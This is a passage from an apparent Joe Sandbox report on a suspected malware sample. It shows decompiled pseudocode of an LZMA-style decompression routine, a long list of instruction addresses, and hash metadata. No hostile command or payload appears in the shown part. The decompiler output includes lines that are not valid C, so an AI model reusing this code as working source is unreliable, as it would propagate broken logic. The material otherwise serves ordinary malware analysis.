                    												 *(__ebp - 0x2c) = __eax;
                    												if(__ebx >= 0xe) {
                    													__ebx = 0;
                    													 *(__ebp - 0x48) = __ecx;
                    													L102:
                    													__eflags =  *(__ebp - 0x48);
                    													if( *(__ebp - 0x48) <= 0) {
                    														__eax = __eax + __ebx;
                    														 *(__ebp - 0x40) = 4;
                    														 *(__ebp - 0x2c) = __eax;
                    														__eax =  *(__ebp - 4);
                    														__eax =  *(__ebp - 4) + 0x644;
                    														__eflags = __eax;
                    														L108:
                    														__ebx = 0;
                    														 *(__ebp - 0x58) = __eax;
                    														 *(__ebp - 0x50) = 1;
                    														 *(__ebp - 0x44) = 0;
                    														 *(__ebp - 0x48) = 0;
                    														L112:
                    														__eax =  *(__ebp - 0x40);
                    														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                    															_t391 = __ebp - 0x2c;
                    															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                    															__eflags =  *_t391;
                    															goto L119;
                    														}
                    														__eax =  *(__ebp - 0x50);
                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    														__eax =  *(__ebp - 0x58);
                    														__esi = __edi + __eax;
                    														 *(__ebp - 0x54) = __esi;
                    														__ax =  *__esi;
                    														__ecx = __ax & 0x0000ffff;
                    														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                    														__eflags =  *(__ebp - 0xc) - __edx;
                    														if( *(__ebp - 0xc) >= __edx) {
                    															__ecx = 0;
                    															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                    															__ecx = 1;
                    															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                    															__ebx = 1;
                    															__ecx =  *(__ebp - 0x48);
                    															__ebx = 1 << __cl;
                    															__ecx = 1 << __cl;
                    															__ebx =  *(__ebp - 0x44);
                    															__ebx =  *(__ebp - 0x44) | __ecx;
                    															__cx = __ax;
                    															__cx = __ax >> 5;
                    															__eax = __eax - __ecx;
                    															__edi = __edi + 1;
                    															__eflags = __edi;
                    															 *(__ebp - 0x44) = __ebx;
                    															 *__esi = __ax;
                    															 *(__ebp - 0x50) = __edi;
                    														} else {
                    															 *(__ebp - 0x10) = __edx;
                    															0x800 = 0x800 - __ecx;
                    															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                    															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    															 *__esi = __dx;
                    														}
                    														__eflags =  *(__ebp - 0x10) - 0x1000000;
                    														if( *(__ebp - 0x10) >= 0x1000000) {
                    															L111:
                    															_t368 = __ebp - 0x48;
                    															 *_t368 =  *(__ebp - 0x48) + 1;
                    															__eflags =  *_t368;
                    															goto L112;
                    														} else {
                    															goto L109;
                    														}
                    													}
                    													__ecx =  *(__ebp - 0xc);
                    													__ebx = __ebx + __ebx;
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                    													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    													 *(__ebp - 0x44) = __ebx;
                    													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                    														__ecx =  *(__ebp - 0x10);
                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    														__ebx = __ebx | 0x00000001;
                    														__eflags = __ebx;
                    														 *(__ebp - 0x44) = __ebx;
                    													}
                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                    													if( *(__ebp - 0x10) >= 0x1000000) {
                    														L101:
                    														_t338 = __ebp - 0x48;
                    														 *_t338 =  *(__ebp - 0x48) - 1;
                    														__eflags =  *_t338;
                    														goto L102;
                    													} else {
                    														goto L99;
                    													}
                    												}
                    												__edx =  *(__ebp - 4);
                    												__eax = __eax - __ebx;
                    												 *(__ebp - 0x40) = __ecx;
                    												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                    												goto L108;
                    											case 0x1a:
                    												L56:
                    												__eflags =  *(__ebp - 0x64);
                    												if( *(__ebp - 0x64) == 0) {
                    													 *(__ebp - 0x88) = 0x1a;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x68);
                    												__al =  *(__ebp - 0x5c);
                    												__edx =  *(__ebp - 8);
                    												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    												 *( *(__ebp - 0x68)) = __al;
                    												__ecx =  *(__ebp - 0x14);
                    												 *(__ecx +  *(__ebp - 8)) = __al;
                    												__eax = __ecx + 1;
                    												__edx = 0;
                    												_t192 = __eax %  *(__ebp - 0x74);
                    												__eax = __eax /  *(__ebp - 0x74);
                    												__edx = _t192;
                    												goto L80;
                    											case 0x1b:
                    												L76:
                    												__eflags =  *(__ebp - 0x64);
                    												if( *(__ebp - 0x64) == 0) {
                    													 *(__ebp - 0x88) = 0x1b;
                    													goto L170;
                    												}
                    												__eax =  *(__ebp - 0x14);
                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    												__eflags = __eax -  *(__ebp - 0x74);
                    												if(__eax >=  *(__ebp - 0x74)) {
                    													__eax = __eax +  *(__ebp - 0x74);
                    													__eflags = __eax;
                    												}
                    												__edx =  *(__ebp - 8);
                    												__cl =  *(__eax + __edx);
                    												__eax =  *(__ebp - 0x14);
                    												 *(__ebp - 0x5c) = __cl;
                    												 *(__eax + __edx) = __cl;
                    												__eax = __eax + 1;
                    												__edx = 0;
                    												_t275 = __eax %  *(__ebp - 0x74);
                    												__eax = __eax /  *(__ebp - 0x74);
                    												__edx = _t275;
                    												__eax =  *(__ebp - 0x68);
                    												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    												_t284 = __ebp - 0x64;
                    												 *_t284 =  *(__ebp - 0x64) - 1;
                    												__eflags =  *_t284;
                    												 *( *(__ebp - 0x68)) = __cl;
                    												L80:
                    												 *(__ebp - 0x14) = __edx;
                    												goto L81;
                    											case 0x1c:
                    												while(1) {
                    													L123:
                    													__eflags =  *(__ebp - 0x64);
                    													if( *(__ebp - 0x64) == 0) {
                    														break;
                    													}
                    													__eax =  *(__ebp - 0x14);
                    													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    													__eflags = __eax -  *(__ebp - 0x74);
                    													if(__eax >=  *(__ebp - 0x74)) {
                    														__eax = __eax +  *(__ebp - 0x74);
                    														__eflags = __eax;
                    													}
                    													__edx =  *(__ebp - 8);
                    													__cl =  *(__eax + __edx);
                    													__eax =  *(__ebp - 0x14);
                    													 *(__ebp - 0x5c) = __cl;
                    													 *(__eax + __edx) = __cl;
                    													__eax = __eax + 1;
                    													__edx = 0;
                    													_t414 = __eax %  *(__ebp - 0x74);
                    													__eax = __eax /  *(__ebp - 0x74);
                    													__edx = _t414;
                    													__eax =  *(__ebp - 0x68);
                    													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                    													__eflags =  *(__ebp - 0x30);
                    													 *( *(__ebp - 0x68)) = __cl;
                    													 *(__ebp - 0x14) = _t414;
                    													if( *(__ebp - 0x30) > 0) {
                    														continue;
                    													} else {
                    														L81:
                    														 *(__ebp - 0x88) = 2;
                    														goto L1;
                    													}
                    												}
                    												 *(__ebp - 0x88) = 0x1c;
                    												goto L170;
                    										}
                    									}
                    									L171:
                    									_t535 = _t534 | 0xffffffff;
                    									goto L172;
                    								}
                    							}
                    						}
                    					}
                    					goto L1;
                    				}
                    			}













                    0x00406d32
                    0x00406d37
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004073ce
                    0x004073ce
                    0x004073d4
                    0x004073da
                    0x004073e0
                    0x004073fa
                    0x004073fd
                    0x00407403
                    0x0040740e
                    0x00407410
                    0x004073e2
                    0x004073e2
                    0x004073f1
                    0x004073f5
                    0x004073f5
                    0x0040741a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406d5f
                    0x00406d61
                    0x00406d64
                    0x00406dd5
                    0x00406dd8
                    0x00406ddb
                    0x00406de2
                    0x00406dec
                    0x004073cb
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x004073cb
                    0x00406d66
                    0x00406d6a
                    0x00406d6d
                    0x00406d6f
                    0x00406d72
                    0x00406d75
                    0x00406d77
                    0x00406d7a
                    0x00406d7c
                    0x00406d81
                    0x00406d84
                    0x00406d87
                    0x00406d8b
                    0x00406d92
                    0x00406d95
                    0x00406d9c
                    0x00406da0
                    0x00406da8
                    0x00406da8
                    0x00406da8
                    0x00406da2
                    0x00406da2
                    0x00406da2
                    0x00406d97
                    0x00406d97
                    0x00406d97
                    0x00406dac
                    0x00406daf
                    0x00406dcd
                    0x00406dcf
                    0x00000000
                    0x00406db1
                    0x00406db1
                    0x00406db4
                    0x00406db7
                    0x00406dba
                    0x00406dbc
                    0x00406dbc
                    0x00406dbc
                    0x00406dbf
                    0x00406dc2
                    0x00406dc4
                    0x00406dc5
                    0x00406dc8
                    0x00000000
                    0x00406dc8
                    0x00000000
                    0x00406ffe
                    0x00407002
                    0x00407020
                    0x00407023
                    0x0040702a
                    0x0040702d
                    0x00407030
                    0x00407033
                    0x00407036
                    0x00407039
                    0x0040703b
                    0x00407042
                    0x00407043
                    0x00407045
                    0x00407048
                    0x0040704b
                    0x0040704e
                    0x0040704e
                    0x00407053
                    0x00000000
                    0x00407053
                    0x00407004
                    0x00407007
                    0x0040700a
                    0x00407014
                    0x004073cb
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x00000000
                    0x00407068
                    0x0040706c
                    0x0040708f
                    0x00407092
                    0x00407095
                    0x0040709f
                    0x0040706e
                    0x0040706e
                    0x00407071
                    0x00407074
                    0x00407077
                    0x00407084
                    0x00407087
                    0x00407087
                    0x004073cb
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x00000000
                    0x004070ab
                    0x004070af
                    0x00000000
                    0x00000000
                    0x004070b5
                    0x004070b9
                    0x00000000
                    0x00000000
                    0x004070bf
                    0x004070c1
                    0x004070c5
                    0x004070c5
                    0x004070c8
                    0x004070cc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407143
                    0x00407147
                    0x0040714e
                    0x00407151
                    0x00407154
                    0x00407149
                    0x00407149
                    0x00407149
                    0x00407157
                    0x0040715a
                    0x00000000
                    0x00000000
                    0x00407203
                    0x00407203
                    0x00407207
                    0x004075a5
                    0x00000000
                    0x004075a5
                    0x0040720d
                    0x00407210
                    0x00407213
                    0x00407217
                    0x0040721a
                    0x00407220
                    0x00407222
                    0x00407222
                    0x00407222
                    0x00407225
                    0x00407228
                    0x00000000
                    0x00000000
                    0x00406df8
                    0x00406df8
                    0x00406dfc
                    0x00407569
                    0x00000000
                    0x00407569
                    0x00406e02
                    0x00406e05
                    0x00406e08
                    0x00406e0c
                    0x00406e0f
                    0x00406e15
                    0x00406e17
                    0x00406e17
                    0x00406e17
                    0x00406e1a
                    0x00406e1d
                    0x00406e1d
                    0x00406e20
                    0x00406e23
                    0x00000000
                    0x00000000
                    0x00406e29
                    0x00406e2f
                    0x00000000
                    0x00000000
                    0x00406e35
                    0x00406e35
                    0x00406e39
                    0x00406e3c
                    0x00406e3f
                    0x00406e42
                    0x00406e45
                    0x00406e46
                    0x00406e49
                    0x00406e4b
                    0x00406e51
                    0x00406e54
                    0x00406e57
                    0x00406e5a
                    0x00406e5d
                    0x00406e60
                    0x00406e63
                    0x00406e7f
                    0x00406e82
                    0x00406e85
                    0x00406e88
                    0x00406e8f
                    0x00406e93
                    0x00406e95
                    0x00406e99
                    0x00406e65
                    0x00406e65
                    0x00406e69
                    0x00406e71
                    0x00406e76
                    0x00406e78
                    0x00406e7a
                    0x00406e7a
                    0x00406e9c
                    0x00406ea3
                    0x00406ea6
                    0x00000000
                    0x00406eac
                    0x00000000
                    0x00406eac
                    0x00000000
                    0x00406eb1
                    0x00406eb1
                    0x00406eb5
                    0x00407575
                    0x00000000
                    0x00407575
                    0x00406ebb
                    0x00406ebe
                    0x00406ec1
                    0x00406ec5
                    0x00406ec8
                    0x00406ece
                    0x00406ed0
                    0x00406ed0
                    0x00406ed0
                    0x00406ed3
                    0x00406ed6
                    0x00406ed6
                    0x00406ed6
                    0x00406edc
                    0x00000000
                    0x00000000
                    0x00406ede
                    0x00406ee1
                    0x00406ee4
                    0x00406ee7
                    0x00406eea
                    0x00406eed
                    0x00406ef0
                    0x00406ef3
                    0x00406ef6
                    0x00406ef9
                    0x00406efc
                    0x00406f14
                    0x00406f17
                    0x00406f1a
                    0x00406f1d
                    0x00406f1d
                    0x00406f20
                    0x00406f24
                    0x00406f26
                    0x00406efe
                    0x00406efe
                    0x00406f06
                    0x00406f0b
                    0x00406f0d
                    0x00406f0f
                    0x00406f0f
                    0x00406f29
                    0x00406f30
                    0x00406f33
                    0x00000000
                    0x00406f35
                    0x00000000
                    0x00406f35
                    0x00406f33
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00000000
                    0x00000000
                    0x00406f75
                    0x00406f75
                    0x00406f79
                    0x00407581
                    0x00000000
                    0x00407581
                    0x00406f7f
                    0x00406f82
                    0x00406f85
                    0x00406f89
                    0x00406f8c
                    0x00406f92
                    0x00406f94
                    0x00406f94
                    0x00406f94
                    0x00406f97
                    0x00406f9a
                    0x00406f9a
                    0x00406fa0
                    0x00406f3e
                    0x00406f3e
                    0x00406f41
                    0x00000000
                    0x00406f41
                    0x00406fa2
                    0x00406fa2
                    0x00406fa5
                    0x00406fa8
                    0x00406fab
                    0x00406fae
                    0x00406fb1
                    0x00406fb4
                    0x00406fb7
                    0x00406fba
                    0x00406fbd
                    0x00406fc0
                    0x00406fd8
                    0x00406fdb
                    0x00406fde
                    0x00406fe1
                    0x00406fe1
                    0x00406fe4
                    0x00406fe8
                    0x00406fea
                    0x00406fc2
                    0x00406fc2
                    0x00406fca
                    0x00406fcf
                    0x00406fd1
                    0x00406fd3
                    0x00406fd3
                    0x00406fed
                    0x00406ff4
                    0x00406ff7
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00407286
                    0x00407286
                    0x0040728a
                    0x004075b1
                    0x00000000
                    0x004075b1
                    0x00407290
                    0x00407293
                    0x00407296
                    0x0040729a
                    0x0040729d
                    0x004072a3
                    0x004072a5
                    0x004072a5
                    0x004072a5
                    0x004072a8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407395
                    0x00407399
                    0x004073bb
                    0x004073be
                    0x004073c8
                    0x004073cb
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x004073cb
                    0x0040739b
                    0x0040739e
                    0x004073a2
                    0x004073a5
                    0x004073a5
                    0x004073a8
                    0x00000000
                    0x00000000
                    0x00407452
                    0x00407456
                    0x00407474
                    0x00407474
                    0x00407474
                    0x0040747b
                    0x00407482
                    0x00407489
                    0x00407489
                    0x00000000
                    0x00407489
                    0x00407458
                    0x0040745b
                    0x0040745e
                    0x00407461
                    0x00407468
                    0x004073ac
                    0x004073ac
                    0x004073af
                    0x00000000
                    0x00000000
                    0x00407543
                    0x00407546
                    0x00407447
                    0x00000000
                    0x00000000
                    0x0040717d
                    0x0040717f
                    0x00407186
                    0x00407187
                    0x00407189
                    0x0040718c
                    0x00000000
                    0x00000000
                    0x00407194
                    0x00407197
                    0x0040719a
                    0x0040719c
                    0x0040719e
                    0x0040719e
                    0x0040719f
                    0x004071a2
                    0x004071a9
                    0x004071ac
                    0x004071ba
                    0x00000000
                    0x00000000
                    0x00407490
                    0x00407490
                    0x00407493
                    0x0040749a
                    0x00000000
                    0x00000000
                    0x0040749f
                    0x0040749f
                    0x004074a3
                    0x004075db
                    0x00000000
                    0x004075db
                    0x004074a9
                    0x004074ac
                    0x004074af
                    0x004074b3
                    0x004074b6
                    0x004074bc
                    0x004074be
                    0x004074be
                    0x004074be
                    0x004074c1
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c7
                    0x004074c7
                    0x004074cb
                    0x0040752b
                    0x0040752e
                    0x00407533
                    0x00407534
                    0x00407536
                    0x00407538
                    0x0040753b
                    0x00407447
                    0x00407447
                    0x00000000
                    0x0040744d
                    0x00407447
                    0x004074cd
                    0x004074d3
                    0x004074d6
                    0x004074d9
                    0x004074dc
                    0x004074df
                    0x004074e2
                    0x004074e5
                    0x004074e8
                    0x004074eb
                    0x004074ee
                    0x00407507
                    0x0040750a
                    0x0040750d
                    0x00407510
                    0x00407514
                    0x00407516
                    0x00407516
                    0x00407517
                    0x0040751a
                    0x004074f0
                    0x004074f0
                    0x004074f8
                    0x004074fd
                    0x004074ff
                    0x00407502
                    0x00407502
                    0x0040751d
                    0x00407524
                    0x00000000
                    0x00407526
                    0x00000000
                    0x00407526
                    0x00000000
                    0x004071c2
                    0x004071c5
                    0x004071fb
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732e
                    0x0040732e
                    0x00407331
                    0x00407333
                    0x004075bd
                    0x00000000
                    0x004075bd
                    0x00407339
                    0x0040733c
                    0x00000000
                    0x00000000
                    0x00407342
                    0x00407346
                    0x00407349
                    0x00407349
                    0x00407349
                    0x00000000
                    0x00407349
                    0x004071c7
                    0x004071c9
                    0x004071cb
                    0x004071cd
                    0x004071d0
                    0x004071d1
                    0x004071d3
                    0x004071d5
                    0x004071d8
                    0x004071db
                    0x004071f1
                    0x004071f6
                    0x0040722e
                    0x0040722e
                    0x00407232
                    0x0040725e
                    0x00407260
                    0x00407267
                    0x0040726a
                    0x0040726d
                    0x0040726d
                    0x00407272
                    0x00407272
                    0x00407274
                    0x00407277
                    0x0040727e
                    0x00407281
                    0x004072ae
                    0x004072ae
                    0x004072b1
                    0x004072b4
                    0x00407328
                    0x00407328
                    0x00407328
                    0x00000000
                    0x00407328
                    0x004072b6
                    0x004072bc
                    0x004072bf
                    0x004072c2
                    0x004072c5
                    0x004072c8
                    0x004072cb
                    0x004072ce
                    0x004072d1
                    0x004072d4
                    0x004072d7
                    0x004072f0
                    0x004072f2
                    0x004072f5
                    0x004072f6
                    0x004072f9
                    0x004072fb
                    0x004072fe
                    0x00407300
                    0x00407302
                    0x00407305
                    0x00407307
                    0x0040730a
                    0x0040730e
                    0x00407310
                    0x00407310
                    0x00407311
                    0x00407314
                    0x00407317
                    0x004072d9
                    0x004072d9
                    0x004072e1
                    0x004072e6
                    0x004072e8
                    0x004072eb
                    0x004072eb
                    0x0040731a
                    0x00407321
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x00000000
                    0x00407323
                    0x00000000
                    0x00407323
                    0x00407321
                    0x00407234
                    0x00407237
                    0x00407239
                    0x0040723c
                    0x0040723f
                    0x00407242
                    0x00407244
                    0x00407247
                    0x0040724a
                    0x0040724a
                    0x0040724d
                    0x0040724d
                    0x00407250
                    0x00407257
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x00000000
                    0x00407259
                    0x00000000
                    0x00407259
                    0x00407257
                    0x004071dd
                    0x004071e0
                    0x004071e2
                    0x004071e5
                    0x00000000
                    0x00000000
                    0x00406f44
                    0x00406f44
                    0x00406f48
                    0x0040758d
                    0x00000000
                    0x0040758d
                    0x00406f4e
                    0x00406f51
                    0x00406f54
                    0x00406f57
                    0x00406f5a
                    0x00406f5d
                    0x00406f60
                    0x00406f62
                    0x00406f65
                    0x00406f68
                    0x00406f6b
                    0x00406f6d
                    0x00406f6d
                    0x00406f6d
                    0x00000000
                    0x00000000
                    0x004070cf
                    0x004070cf
                    0x004070d3
                    0x00407599
                    0x00000000
                    0x00407599
                    0x004070d9
                    0x004070dc
                    0x004070df
                    0x004070e2
                    0x004070e4
                    0x004070e4
                    0x004070e4
                    0x004070e7
                    0x004070ea
                    0x004070ed
                    0x004070f0
                    0x004070f3
                    0x004070f6
                    0x004070f7
                    0x004070f9
                    0x004070f9
                    0x004070f9
                    0x004070fc
                    0x004070ff
                    0x00407102
                    0x00407105
                    0x00407105
                    0x00407105
                    0x00407108
                    0x0040710a
                    0x0040710a
                    0x00000000
                    0x00000000
                    0x0040734c
                    0x0040734c
                    0x0040734c
                    0x00407350
                    0x00000000
                    0x00000000
                    0x00407356
                    0x00407359
                    0x0040735c
                    0x0040735f
                    0x00407361
                    0x00407361
                    0x00407361
                    0x00407364
                    0x00407367
                    0x0040736a
                    0x0040736d
                    0x00407370
                    0x00407373
                    0x00407374
                    0x00407376
                    0x00407376
                    0x00407376
                    0x00407379
                    0x0040737c
                    0x0040737f
                    0x00407382
                    0x00407385
                    0x00407389
                    0x0040738b
                    0x0040738e
                    0x00000000
                    0x00407390
                    0x0040710d
                    0x0040710d
                    0x00000000
                    0x0040710d
                    0x0040738e
                    0x004075c3
                    0x00000000
                    0x00000000
                    0x00406bf2
                    0x004075fa
                    0x004075fa
                    0x00000000
                    0x004075fa
                    0x00407447
                    0x004073ce
                    0x004073cb
                    0x00000000
                    0x00407120

                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                    • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                    • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                    • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E00407068() {
                    				unsigned short _t531;
                    				signed int _t532;
                    				void _t533;
                    				signed int _t534;
                    				signed int _t535;
                    				signed int _t565;
                    				signed int _t568;
                    				signed int _t589;
                    				signed int* _t606;
                    				void* _t613;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					if( *(_t613 - 0x40) != 0) {
                    						 *(_t613 - 0x84) = 0xa;
                    						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                    					} else {
                    						 *(__ebp - 0x84) = 9;
                    						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                    					}
                    					while(1) {
                    						 *(_t613 - 0x54) = _t606;
                    						while(1) {
                    							L133:
                    							_t531 =  *_t606;
                    							_t589 = _t531 & 0x0000ffff;
                    							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                    							if( *(_t613 - 0xc) >= _t565) {
                    								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                    								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                    								 *(_t613 - 0x40) = 1;
                    								_t532 = _t531 - (_t531 >> 5);
                    								 *_t606 = _t532;
                    							} else {
                    								 *(_t613 - 0x10) = _t565;
                    								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                    								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                    							}
                    							if( *(_t613 - 0x10) >= 0x1000000) {
                    								goto L139;
                    							}
                    							L137:
                    							if( *(_t613 - 0x6c) == 0) {
                    								 *(_t613 - 0x88) = 5;
                    								L170:
                    								_t568 = 0x22;
                    								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                    								_t535 = 0;
                    								L172:
                    								return _t535;
                    							}
                    							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                    							L139:
                    							_t533 =  *(_t613 - 0x84);
                    							while(1) {
                    								 *(_t613 - 0x88) = _t533;
                    								while(1) {
                    									L1:
                    									_t534 =  *(_t613 - 0x88);
                    									if(_t534 > 0x1c) {
                    										break;
                    									}
                    									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                    										case 0:
                    											if( *(_t613 - 0x6c) == 0) {
                    												goto L170;
                    											}
                    											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    											_t534 =  *( *(_t613 - 0x70));
                    											if(_t534 > 0xe1) {
                    												goto L171;
                    											}
                    											_t538 = _t534 & 0x000000ff;
                    											_push(0x2d);
                    											asm("cdq");
                    											_pop(_t570);
                    											_push(9);
                    											_pop(_t571);
                    											_t609 = _t538 / _t570;
                    											_t540 = _t538 % _t570 & 0x000000ff;
                    											asm("cdq");
                    											_t604 = _t540 % _t571 & 0x000000ff;
                    											 *(_t613 - 0x3c) = _t604;
                    											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                    											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                    											_t612 = (0x300 << _t604 + _t609) + 0x736;
                    											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                    												L10:
                    												if(_t612 == 0) {
                    													L12:
                    													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                    													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                    													goto L15;
                    												} else {
                    													goto L11;
                    												}
                    												do {
                    													L11:
                    													_t612 = _t612 - 1;
                    													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                    												} while (_t612 != 0);
                    												goto L12;
                    											}
                    											if( *(_t613 - 4) != 0) {
                    												GlobalFree( *(_t613 - 4));
                    											}
                    											_t534 = GlobalAlloc(0x40, 0x600); // executed
                    											 *(_t613 - 4) = _t534;
                    											if(_t534 == 0) {
                    												goto L171;
                    											} else {
                    												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                    												goto L10;
                    											}
                    										case 1:
                    											L13:
                    											__eflags =  *(_t613 - 0x6c);
                    											if( *(_t613 - 0x6c) == 0) {
                    												 *(_t613 - 0x88) = 1;
                    												goto L170;
                    											}
                    											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                    											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    											_t45 = _t613 - 0x48;
                    											 *_t45 =  *(_t613 - 0x48) + 1;
                    											__eflags =  *_t45;
                    											L15:
                    											if( *(_t613 - 0x48) < 4) {
                    												goto L13;
                    											}
                    											_t546 =  *(_t613 - 0x40);
                    											if(_t546 ==  *(_t613 - 0x74)) {
                    												L20:
                    												 *(_t613 - 0x48) = 5;
                    												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                    												goto L23;
                    											}
                    											 *(_t613 - 0x74) = _t546;
                    											if( *(_t613 - 8) != 0) {
                    												GlobalFree( *(_t613 - 8));
                    											}
                    											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                    											 *(_t613 - 8) = _t534;
                    											if(_t534 == 0) {
                    												goto L171;
                    											} else {
                    												goto L20;
                    											}
                    										case 2:
                    											L24:
                    											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                    											 *(_t613 - 0x84) = 6;
                    											 *(_t613 - 0x4c) = _t553;
                    											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                    											 *(_t613 - 0x54) = _t606;
                    											goto L133;
                    										case 3:
                    											L21:
                    											__eflags =  *(_t613 - 0x6c);
                    											if( *(_t613 - 0x6c) == 0) {
                    												 *(_t613 - 0x88) = 3;
                    												goto L170;
                    											}
                    											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    											_t67 = _t613 - 0x70;
                    											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                    											__eflags =  *_t67;
                    											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                    											L23:
